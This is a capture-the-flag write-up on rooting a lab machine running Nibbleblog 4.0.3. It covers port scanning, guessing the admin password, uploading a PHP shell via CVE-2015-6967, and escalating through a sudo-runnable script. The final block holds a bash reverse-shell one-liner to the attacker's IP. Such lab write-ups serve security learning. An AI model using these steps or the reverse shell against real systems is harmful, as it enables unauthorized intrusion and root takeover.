How to crack the Nibbles box without Metasploit.
tl;dr
- Nibbleblog v4.0.3 Code Execution
- CVE-2015-6967
Solved by: 7h3M0nk
A Linux box with IP 10.10.10.75
Enumeration
Let’s start with a port scan. I am using nmap, so a basic scan comes first.
The box has two services: OpenSSH on port 22 and Apache on port 80. The Apache version reported is old enough that Shellshock (a bash bug, reached through CGI scripts rather than Apache itself) is worth a check, but http://10.10.10.75/cgi-bin/ returns “directory not found”.
Time to move on.
On checking the page source, I got a hint pointing at /nibbleblog.
Let’s check out the /nibbleblog directory.
Time to get more info on Nibbleblog. A search for Nibbleblog landed me on a page describing how to upload a shell to version 4.0.3 (CVE-2015-6967).
As per that blog, once I have admin access I can upload a PHP shell.
Checking whether admin.php exists.
This is where I got stuck for a while: trying to log in with some default passwords got me blacklisted. I tried the page again after a couple of minutes and was not blacklisted anymore, but brute forcing won’t work here. Need to guess!
Tried admin:nibbles, which worked and got me admin access. Phew!
Exploit
Recreating the steps given in the blog.
Uploading a PHP shell.
Browsing to the plugin directory, opening the shell, and grabbing the user flag.
We don’t have root yet, so let’s check whether the user can run anything with sudo.
```bash
sudo -l
```
Nice! monitor.sh can be run with sudo, but the directory personal/stuff does not exist. Let’s create it and add the file monitor.sh.
We can make that file a reverse shell and get the root flag. Two things to get right: the script has to be executable (sudo will refuse to run it otherwise), and a listener must be waiting on the attacking machine (port 800 here) before it is run with sudo.
```bash
touch monitor.sh; echo "#!/bin/bash" >> monitor.sh; echo "bash -i >& /dev/tcp/10.10.14.7/800 0>&1" >> monitor.sh; chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
```
And that’s how I solved Nibbles!